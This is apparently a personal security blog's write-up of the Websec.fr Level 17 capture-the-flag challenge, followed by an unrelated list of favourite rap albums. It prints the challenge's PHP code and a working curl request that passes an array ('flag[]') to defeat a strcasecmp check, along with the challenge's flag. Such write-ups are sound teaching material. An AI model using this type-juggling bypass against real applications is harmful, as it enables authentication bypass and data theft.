Websec.fr Level 17

alt text

The code of level17 is here.

 <?php
include "flag.php";

function sleep_rand() { /* I wish php5 had random_int() */
        $range = 100000;
        $bytes = (int) (log($range, 2) / 8) + 1;
        do {  /* Side effect: more random cpu cycles wasted ;) */
            $rnd = hexdec(bin2hex(openssl_random_pseudo_bytes($bytes)));
        } while ($rnd >= $range);
        usleep($rnd);
}
?>
<!DOCTYPE html>
<html>
.......
                        <?php
                        if (isset ($_POST['flag'])):
                            sleep_rand(); /* This makes timing-attack impractical. */
                        ?>
            <br>
                        <div class="container">
                            <div class="row">
                                <?php
                                if (! strcasecmp ($_POST['flag'], $flag))
                                    echo '<div class="alert alert-success">Here is your flag: <mark>' . $flag . '</mark>.</div>';   
                                else
                                    echo '<div class="alert alert-danger">Invalid flag, sorry.</div>';
                                ?>
                            </div>
                        </div>
                        <?php endif ?>
........
</html>

After reading the code, we can ignore the first part of the PHP code because it’s impossible to break this function.
But in the second part, the only thing that can lead to a vulnerability is strcasecmp. This function checks if the input matches the flag.
Reading strcasecmp php documentation we can see that :

Returns a value less than 0 if string1 is less than string2; a value greater than 0 if string1 is greater than string2, and 0 if they are equal.

So this vulnerability looks like type juggling, we just have to make strcasecmp return 0 or true to exfiltrate the flag.
After some research I read this article which explains exactly what I want, if we compare a string with another type of value like array strcasecmp returns 0.

Using DevTools in network section I sent a POST request and copy as Curl and modify it.

tedsig42@exegol:~# curl 'http://websec.fr/level17/index.php' -X POST  --data-raw 'flag[]=a&submit=Go'
<!DOCTYPE html>
<html>
................
                                <div class="alert alert-success">Here is your flag: <mark>WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}</mark>.</div>                            </div>
...............
</html>

Flag : WEBSEC{It_seems_that_php_could_use_a_stricter_typing_system}

Tedsig42

Another infosec enthusiast blog

A Rap / Classic Album that i ❤️

Caballero & Jeanjass - ZushiBoyz vol.4 - Edition exclusive (avec OBI)

Rounhaa - Jaafar

Selug & $enar - Éternel retour

ZushiBoyz vol.3 - Edition exclusive (avec OBI)

Absolem - Les yeux grands fermés

Al-Walid - Sarman??

Alpha Wann - Don Dada Mixtape

Alpha Wann - UMLA

Beeby - Gaia

Beeby - Morningstar

Beeby - UN GRAND CŒUR DANS UN MONDE DE FILS DE PUTE

Bushi - Bushi Tape 3

Caballero & Jeanjass - DOuble Helice 3

Caballero & Jeanjass - High & Fines Herbes

Caballero & Jeanjass - Zushiboyz Vol .1

Caballero & Jeanjass - Zushiboyz Vol.2

Caballero - Dose Heroique

Chavi & Guydelafonsdal - Chavidelafonsdal

Damso - Batterie Faible

Damso - Ipseite

Damso - Lithopedion

Damso - QALF

Deen Burbigo - Cercle Vertueux

Deen Burbigo - OG SAN 1

Deen Burbigo -OG SAN 2

Dimeh - OV3

GAL - Du Caviar Pour Mon Chien

GAL - JeuneBeurdelafontaine vol2

HJeuneCrack - La Pieuvre

HJeuneCrack - Matiere Premiere

HJeunecrack - 1er Mouvement

HJeunecrack - 3eme Cycle

Hamza -1994

Hamza -Paradise

Huntrill - LE BRUIT DE LA MACHINE A BILLETS

Huntrill - Replica 2

Infinit - 888

Infinit - Ma vie est un film 2

Infinit - Mr Le Faire

Isha & Limsa D'Aulnay - Bitume caviar

JUngle Jack - Jungle des illusions Vol 2

JeanJass - Goldman

Jeanjass - Doudoune en été

Jeanjass - Tous ces ongles rongés

Jok'AIr - Jok'Rambo

Jok'Air - Jok'Chirac

Jok'Air - Jok'Travolta

Jok'Air - New Jok City

Josman - J.000.$

Josman - J.O.$

Josman - M.A.N (Black Roses & Lost Feelings)

Josman - MYSTR J.O.$

Josman - SPLIT

Jungle Jack - Cognacs et Cigarette

Jungle Jack - Creamland

Jungle Jack - Jungle des illusions

Keroue - Candella

Keroue - Record

Keroue - Scope

LaFeve - 24

LaFeve - ERRR

Le Monde Daho - Le Monde 00

Ledouble & Guydelafonsdal - LeDoubledelafonsdal

Lefa - Fame

Lefa -3 du mat

Lefa-DMNR

Luidji - Boscolo Exedra

Luidji - Saison 00

Luidji - Tristesse Business

Luther - EXIT

Luther - Garçon

Mairo - Omar Chappier

Mairo - Dejeuner en paix

Mairo, H JeuneCrack - La solution

Makala - Chaos Kiss

Makala - Radio Suicide

Nekfeu - LEV

Nepal - Adios Bahamas

Nes - CQSS

Nes - LA COURSE

Nes - Pour 2 VRAI

Nes - ÇA VA ALLER

Nujabes - MetaphoricalMusic

Nujabes - Modal Music

Nujabes - departure

OgLounis & Guydelafonsdal - OgLounisdelafonsdal

Oglounis - HARD LAIDBACKING BEFORE

Prince Wally - Moussa

Romeo Elvis - Chocolat

Romeo Elvis - Tout Peut Arriver

Romeo Elvis Morale

Selug & Kyo Itachi - TATAKAE

Slimka - Le Grand Mystico

Tisma & Guydelafonsdal - Tismadelafonsdal

Toothpick & Guydelafonsdal - Toothpickdelafonsdal

Vald - Agartha

Vald - Ce Monde Est Cruel

Vald - V

Varnish la Piscine - THIS LAKE IS SUCCESSFUL

Yvnnis - NOVAE

Zushiboyz (Info)

a5el - Mercenaire

okis & Mani Deïz - Rêve d'un rouilleur

2025-12-10